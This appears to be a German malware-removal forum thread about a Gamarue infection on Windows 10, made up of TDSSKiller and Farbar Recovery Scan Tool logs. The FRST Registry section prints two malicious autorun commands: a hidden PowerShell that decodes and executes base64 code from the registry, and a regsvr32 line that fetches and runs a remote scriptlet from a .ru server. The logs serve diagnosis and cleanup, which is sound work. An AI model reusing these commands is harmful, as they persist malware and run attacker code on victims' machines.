21:37:35.0423 0x1ac0 [ 1AE1076034392218EE89D2744EC2A071, 695C28E2697B12BBD919687176CE082E94887A5D8B6229F163A26F6EDF401C4C ] Wof C:\WINDOWS\system32\drivers\Wof.sys 21:37:35.0438 0x1ac0 Wof - ok 21:37:35.0470 0x1ac0 [ D571821EDAA1F23EB521314FB9AA1C88, 7F16E6915060BD5FABE0805284631F92EEC11234579D09C3CEDDBF73D312E7F5 ] workfolderssvc C:\WINDOWS\system32\workfolderssvc.dll 21:37:35.0563 0x1ac0 workfolderssvc - ok 21:37:35.0563 0x1ac0 [ 2AD9CC8445F0E1A8900A9DE123643CD2, A5928B26722DFBB201A32DEF48B25D4BF291815EA68CF50CBE79EEA9260A71E3 ] WPDBusEnum C:\WINDOWS\system32\wpdbusenum.dll 21:37:35.0595 0x1ac0 WPDBusEnum - ok 21:37:35.0595 0x1ac0 [ 1FD80CBB192A20375F3664639DEB57B5, 7A4789D4B2F8E289726E1C723DC00D5AC1F8C5E00FB2879C9D0E6DDC97D2B1A6 ] WpdUpFltr C:\WINDOWS\system32\drivers\WpdUpFltr.sys 21:37:35.0610 0x1ac0 WpdUpFltr - ok 21:37:35.0610 0x1ac0 [ 3369EF007E43B88EAC8F1789B43D4393, 347F9F7DF980BB739895EDFE72E2E595EF56634330DC63DAA36403AB232B5B5A ] WpnService C:\WINDOWS\system32\WpnService.dll 21:37:35.0641 0x1ac0 WpnService - ok 21:37:35.0657 0x1ac0 [ 41403B9466EDA80FACD7713478A56DF8, A71BF9C7A2483FE1F660AC9688FCB38BA2310F16A69EB117C948458364953F34 ] WpnUserService C:\WINDOWS\System32\WpnUserService.dll 21:37:35.0673 0x1ac0 WpnUserService - ok 21:37:35.0673 0x1ac0 [ DAF4451760B46CB383D287C4FAFFE97D, 658AFE31EF50E934FEDD2E7048257DBFE9E6DE5F1ACDC658B21737391CF1CC5A ] ws2ifsl C:\WINDOWS\system32\drivers\ws2ifsl.sys 21:37:35.0688 0x1ac0 ws2ifsl - ok 21:37:35.0704 0x1ac0 [ D4A0661AB0FE542460CA76BFB4FAA2D6, 149F0A0720C47BFFCA68165A46382E5CBB273F48483DBB598CEA320801664718 ] wscsvc C:\WINDOWS\System32\wscsvc.dll 21:37:35.0720 0x1ac0 wscsvc - ok 21:37:35.0720 0x1ac0 WSearch - ok 21:37:35.0813 0x1ac0 [ 05BEDBBEEAAC22F98FCA529FAC659582, E4D2FFF98034E2E7FE0478AB9C8D677CA932349A976DFC0C2B65DB15C71354B4 ] wuauserv C:\WINDOWS\system32\wuaueng.dll 21:37:35.0954 0x1ac0 wuauserv - ok 21:37:35.0954 0x1ac0 [ 455609BF60DA3B57EEAB863DEFCCF14D, 
F55271C42B7AFD17D01275703719C1F52C21996DB82AC78A70A8A8B62370623B ] WudfPf C:\WINDOWS\system32\drivers\WudfPf.sys 21:37:35.0970 0x1ac0 WudfPf - ok 21:37:35.0985 0x1ac0 [ 5068DAA8F67A62E964C9C9F88B159EA9, 09FCB7A817280957D1AD365EF8B46F666C70957238BF9FBC87D51115E1B0FCB0 ] WUDFRd C:\WINDOWS\System32\drivers\WUDFRd.sys 21:37:36.0001 0x1ac0 WUDFRd - ok 21:37:36.0001 0x1ac0 [ 9EFE23CA208BF4B613FF4A6028DFAB10, 483D8D8DA578BF3EA5617EAB42457543EC6F97C1977BDD8ABFDF854AE3AAFD35 ] wudfsvc C:\WINDOWS\System32\WUDFSvc.dll 21:37:36.0016 0x1ac0 wudfsvc - ok 21:37:36.0016 0x1ac0 [ 5068DAA8F67A62E964C9C9F88B159EA9, 09FCB7A817280957D1AD365EF8B46F666C70957238BF9FBC87D51115E1B0FCB0 ] WUDFWpdFs C:\WINDOWS\system32\DRIVERS\WUDFRd.sys 21:37:36.0032 0x1ac0 WUDFWpdFs - ok 21:37:36.0063 0x1ac0 [ 3EEF7185E0974D9AB2D65CA3214132CF, 44DB1D11B6B1D180F59AB3FE4D7235F7F2FD709A853F6A64E8E379FFFD16CD3C ] WwanSvc C:\WINDOWS\System32\wwansvc.dll 21:37:36.0126 0x1ac0 WwanSvc - ok 21:37:36.0141 0x1ac0 [ FC0147AB34C7CDB2D8A1B29C207F2CD1, 737D40A4BE35AD13C091D8E320FAD3FD7C0C7E41C8B50E48D3C2151712A55718 ] xbgm C:\WINDOWS\System32\xbgmsvc.dll 21:37:36.0157 0x1ac0 xbgm - ok 21:37:36.0173 0x1ac0 [ 8C7C5945C3545CA767BE111D78C15314, 5A938679DA3EDA2D9CA7034908DFEFCC7DAADB10DFD0CF4ECE882FF536D1BFA2 ] XblAuthManager C:\WINDOWS\System32\XblAuthManager.dll 21:37:36.0204 0x1ac0 XblAuthManager - ok 21:37:36.0235 0x1ac0 [ A8BD191F46CC58E45637CB3E262CF0F2, CA65524427ECDB5E1138A5F8E885566064E507BA60FC31E0D9D17B9556CC9ADC ] XblGameSave C:\WINDOWS\System32\XblGameSave.dll 21:37:36.0298 0x1ac0 XblGameSave - ok 21:37:36.0313 0x1ac0 [ B10655A4C2EFDC25483D670EF52A4854, 2D9DC81AE73FDFE7F4E395BEC8E806E6BAD8DE0470027EEEC256AC4A4B7C7AA4 ] xboxgip C:\WINDOWS\System32\drivers\xboxgip.sys 21:37:36.0345 0x1ac0 xboxgip - ok 21:37:36.0345 0x1ac0 [ E099DED5C602AE4A7ECCF7CD4B1D2E33, 7FDAFFE13B87A8E6AA8721F8905FFF6EF04CAB93009F68EDA862B57EBB04514F ] XboxGipSvc C:\WINDOWS\System32\XboxGipSvc.dll 21:37:36.0360 0x1ac0 XboxGipSvc - ok 
21:37:36.0391 0x1ac0 [ EF83C2EF7F152DFDC6D9F1AEC6FBE66F, 21D4FCD12F9D40D066F05936131A4F7BAB301DD800C85921476EC182B9D27D0B ] XboxNetApiSvc C:\WINDOWS\system32\XboxNetApiSvc.dll 21:37:36.0454 0x1ac0 XboxNetApiSvc - ok 21:37:36.0454 0x1ac0 [ 2E50A379A8E4F6C5D85E87C26C08D329, ADA0C344FE58A3772FFF7417268160E488741C5B2F08CA12ED587AB7F75756F6 ] xinputhid C:\WINDOWS\System32\drivers\xinputhid.sys 21:37:36.0470 0x1ac0 xinputhid - ok 21:37:36.0548 0x1ac0 [ D071942124D71F26546B8B11774EB867, 2496760FFB97D5CEB2AF5D91490DDE630C0BD723F0C7488BCC7247490F11FF34 ] ZeroConfigService C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe 21:37:36.0626 0x1ac0 ZeroConfigService - ok 21:37:36.0626 0x1ac0 ================ Scan global =============================== 21:37:36.0641 0x1ac0 [ EEA8447A2E39A39F66C74BA66C421F92, 7FFC5294E0D0438E7450ED36947AB04D0C84DF4E1C9F2D49340D3BA586FFFAB2 ] C:\WINDOWS\system32\basesrv.dll 21:37:36.0641 0x1ac0 [ A5AE05D3674CBA5DD28C5580E238B059, 5298CF9CEB84FBDC7CAD9969CAFE7D9FFFCA625D50F8BDF877FCEAE8426375F7 ] C:\WINDOWS\system32\winsrv.dll 21:37:36.0641 0x1ac0 [ 7DD72CBE412C9567661F4B1CE9631FC1, 8D914805CBDAF448C8C132C4C3FEB1D90804F4F485180F7364A75EC5655A4DDB ] C:\WINDOWS\system32\sxssrv.dll 21:37:36.0657 0x1ac0 [ 800D00D1A7ADA9E341CACDF287347584, 70AD5A458203B35F227F3F6B4783D00424C96AA9E29DB3090CEC8C00E62CD8E5 ] C:\WINDOWS\system32\services.exe 21:37:36.0673 0x1ac0 [ Global ] - ok 21:37:36.0673 0x1ac0 ================ Scan MBR ================================== 21:37:36.0673 0x1ac0 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0 21:37:36.0798 0x1ac0 \Device\Harddisk0\DR0 - ok 21:37:36.0798 0x1ac0 ================ Scan VBR ================================== 21:37:36.0813 0x1ac0 [ B079ED7D1DEFA495A022B775C0C0E9A5 ] \Device\Harddisk0\DR0\Partition1 21:37:36.0813 0x1ac0 \Device\Harddisk0\DR0\Partition1 - ok 21:37:36.0813 0x1ac0 [ B0DD3A3B74D54FCB465D830A8FB4417A ] \Device\Harddisk0\DR0\Partition2 21:37:36.0813 0x1ac0 \Device\Harddisk0\DR0\Partition2 - 
ok 21:37:36.0829 0x1ac0 ================ Scan generic autorun ====================== 21:37:36.0829 0x1ac0 SecurityHealth - ok 21:37:36.0907 0x1ac0 [ 2F41FE54CD72C5A4CC4785D6ED7E7E88, 384DF6C5B5BFAAE20F972335CFD84785E83881C030FDA68A16D542D0CAD8D855 ] C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe 21:37:37.0001 0x1ac0 NvBackend - ok 21:37:37.0079 0x1ac0 [ 555ED8FE114EF3A2728625991DA64759, CF313C155FFB47304F2E06D68C62CEFF783D890B2331BE6F7B131B614EAFD1F3 ] C:\Program Files (x86)\Dropbox\Client\Dropbox.exe 21:37:37.0141 0x1ac0 Dropbox - ok 21:37:37.0157 0x1ac0 [ 5B6E8E09BE6401A7E022F52FDFCB2FF8, 471C556CF9405BBB380A8CEFE945C126B954B7C94F79CC72441B51F80141FC5E ] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe 21:37:37.0173 0x1ac0 SunJavaUpdateSched - ok 21:37:37.0204 0x1ac0 [ 9233EE8EF479551CBE721B7523A8CF45, 8A6FA3DFC059FA858E90430CDE9CD65BB403D5F4B0D4A2A03FE711D253E1AAF4 ] C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe 21:37:37.0235 0x1ac0 ADSKAppManager - ok 21:37:37.0235 0x1ac0 [ 085772CDE3100F6E82CC3469B82682FA, EE48A7FCE3A41DD7D3F54F1B873F0350F60A32AA37568F83A48BB0B2C1E66E86 ] C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PIconStartup.exe 21:37:37.0251 0x1ac0 IMSS - ok 21:37:37.0735 0x1ac0 [ 450FDD861FD582026BDCE55FCB2162C4, 91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe 21:37:38.0251 0x1ac0 OneDriveSetup - ok 21:37:38.0694 0x1ac0 [ 450FDD861FD582026BDCE55FCB2162C4, 91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe 21:37:39.0104 0x1ac0 OneDriveSetup - ok 21:37:39.0151 0x1ac0 [ BE8FFEBE1C4B5E18A56101A3C0604EA0, D2434E607451A4D29D28F43A529246DC81D25A2FAE9C271E28C55452C09A28A5 ] C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 21:37:39.0183 0x1ac0 {C2956868-62F6-438A-A9BC-12CB233D69BF} - ok 21:37:39.0183 0x1ac0 COM+ - ok 21:37:39.0657 0x1ac0 [ 
450FDD861FD582026BDCE55FCB2162C4, 91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe 21:37:40.0081 0x1ac0 OneDriveSetup - ok 21:37:40.0112 0x1ac0 [ 9203CEE59C720D1D4BB9A97E4DE4152D, 55743BBED85C3EDB764F30648F23951FE8C76FC4984216596306F4E453D0CCB5 ] C:\Program Files (x86)\Windows Mail\wab.exe 21:37:40.0128 0x1ac0 WAB Migrate - ok 21:37:40.0128 0x1ac0 Waiting for KSN requests completion. In queue: 283 21:37:41.0151 0x1ac0 Waiting for KSN requests completion. In queue: 283 21:37:42.0182 0x1ac0 AV detected via SS2: Windows Defender, C:\Program Files\Windows Defender\MSASCui.exe ( 4.11.15063.332 ), 0x61100 ( enabled : updated ) 21:37:42.0214 0x1ac0 Win FW state via NFP2: enabled ( trusted ) 21:37:42.0339 0x1ac0 ============================================================ 21:37:42.0339 0x1ac0 Scan finished 21:37:42.0339 0x1ac0 ============================================================ 21:37:42.0354 0x0d38 Detected object count: 0 21:37:42.0354 0x0d38 Actual detected object count: 0 |
04.07.2017, 20:51 | #12 |
| Windows 10 - Gamarue Step 2: Code:
Farbar Recovery Scan Tool (x64) Version: 03-07-2017 01
durchgeführt von ararat (04-07-2017 21:39:59)
Gestartet von C:\Users\ararat\Desktop
Start-Modus: Normal

================== Datei-Suche: "msiexec.exe " =============

C:\Windows\WinSxS\x86_microsoft-windows-installer-executable_31bf3856ad364e35_10.0.15063.0_none_fe76b282068b2ad7\msiexec.exe
[2017-03-18 22:58][2017-03-18 22:58] 0059392 _____ (Microsoft Corporation) 98EEBF39B025339CF12672030777707D [Datei ist digital signiert]
C:\Windows\WinSxS\amd64_microsoft-windows-installer-executable_31bf3856ad364e35_10.0.15063.0_none_5a954e05bee89c0d\msiexec.exe
[2017-03-18 22:57][2017-03-18 22:57] 0066048 _____ (Microsoft Corporation) BCEC1D69554D9DFC82E599B74ABC9963 [Datei ist digital signiert]
C:\Windows\SysWOW64\msiexec.exe
[2017-03-18 22:58][2017-03-18 22:58] 0059392 _____ (Microsoft Corporation) 98EEBF39B025339CF12672030777707D [Datei ist digital signiert]
C:\Windows\System32\msiexec.exe
[2017-03-18 22:57][2017-03-18 22:57] 0066048 _____ (Microsoft Corporation) BCEC1D69554D9DFC82E599B74ABC9963 [Datei ist digital signiert]

====== Ende von Suche ======

Step 3: Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 03-07-2017 01
durchgeführt von ararat (Administrator) auf ARARAT-NOTEBOOK (04-07-2017 21:41:45)
Gestartet von C:\Users\ararat\Desktop
Geladene Profile: ararat (Verfügbare Profile: ararat & DefaultAppPool)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: "C:\Program Files\SRWare Iron (64-Bit)\chrome.exe" -- "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(Lenovo.) C:\Windows\System32\LPlatSvc.exe
() C:\Windows\System32\nvwmi64.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Autodesk Inc.) C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(WIBU-SYSTEMS AG) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated) C:\Windows\System32\valWBFPolicyService.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Synaptics Incorporated) C:\Windows\System32\valWbioSyncSvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
() C:\Windows\System32\nvwmi64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynFP\Shared\SensorDBSynch.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Lenovo.) C:\Windows\System32\LPlatSvc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tposd.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Synaptics) C:\Program Files\Synaptics\SynTP\SynLenovoHelper.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.Device.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.Device.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.410_none_9e914f9d2d85dacb\TiWorker.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [1804432 2015-12-22] (NVIDIA Corporation)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [3486520 2017-06-26] (Dropbox, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [477064 2013-12-22] (Autodesk Inc.)
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PrivacyIconClient.exe [1178912 2016-02-25] (Intel Corporation)
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Run: [{C2956868-62F6-438A-A9BC-12CB233D69BF}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\BPMJBABA').nhnPLmKgFtez)));
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.39slxu3bw.ru/deploy.xml scrobj.dll
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodeMeter Control Center.lnk [2016-02-23]
ShortcutTarget: CodeMeter Control Center.lnk -> C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeterCC.exe (WIBU-SYSTEMS AG)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Netzwerk Server.lnk [2016-02-23]
ShortcutTarget: Netzwerk Server.lnk -> C:\Program Files (x86)\WIBUKEY\Server\WkSvMgr.exe (WIBU-SYSTEMS AG)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{870c603a-60f8-4e24-9690-e4821fe96d21}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{e862264f-fb30-45d1-a3f9-1bf499d21b67}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.netflix.com/
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2016-02-23] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2016-02-23] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: pnaz2so4.default
FF ProfilePath: C:\Users\ararat\AppData\Roaming\Mozilla\Firefox\Profiles\pnaz2so4.default [2016-03-28]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2016-02-23] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2016-02-23] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-11-05] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-11-05] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [576904 2013-12-22] (Autodesk Inc.)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [49992 2017-06-26] (Dropbox, Inc.)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [373744 2016-11-02] (Intel Corporation)
R2 ImControllerService; C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [57160 2017-06-05] (Lenovo Group Limited)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [974632 2016-02-19] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [209184 2016-02-25] (Intel Corporation)
R2 Lenovo Instant On; C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe [3124808 2017-04-28] (Lenovo Group Limited)
R2 LPlatSvc; C:\WINDOWS\system32\LPlatSvc.exe [710144 2016-09-06] (Lenovo.)
S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-06-02] (Lenovo)
S4 McNeelUpdate; C:\Program Files (x86)\McNeelUpdate\5.0\McNeelUpdateService.exe [68192 2013-12-07] (Robert McNeel & Associates)
S3 mi-raysat_3dsmax2015_64; C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe [86016 2011-09-15] () [Datei ist nicht signiert]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2017-02-13] ()
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-05-01] (NVIDIA Corporation)
R2 NVWMI; C:\Windows\system32\nvwmi64.exe [3180176 2015-12-22] ()
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
S3 SSSvc; C:\Program Files (x86)\SmartSense\SSSvc.exe [124752 2016-03-15] (Lenovo)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [259176 2016-10-03] (Synaptics Incorporated)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10351856 2016-12-15] (TeamViewer GmbH)
R2 valWBFPolicyService; C:\WINDOWS\system32\valWBFPolicyService.exe [86544 2016-07-13] (Synaptics Incorporated)
R2 valWbioSyncSvc; C:\WINDOWS\system32\valWbioSyncSvc.exe [56848 2016-07-13] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3743648 2017-02-13] (Intel® Corporation)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 blackberryncm; C:\WINDOWS\System32\drivers\blackberryncm6_AMD64.sys [36360 2016-04-06] (BlackBerry)
R3 e1dexpress; C:\WINDOWS\system32\DRIVERS\e1d62x64.sys [519680 2015-12-08] (Intel Corporation)
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [244744 2017-04-13] (Intel Corporation)
R0 IntelHSWPcc; C:\WINDOWS\System32\drivers\IntelPcc.sys [88256 2015-06-09] (Intel Corporation)
S3 NETwNs64; C:\WINDOWS\System32\drivers\Netwsw02.sys [3422472 2015-12-25] (Intel Corporation)
R3 Netwtw04; C:\WINDOWS\system32\DRIVERS\Netwtw04.sys [7630072 2017-03-21] (Intel Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvlddmkm.sys [14456920 2017-05-18] (NVIDIA Corporation)
R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [423128 2013-07-24] (Realsil Semiconductor Corporation)
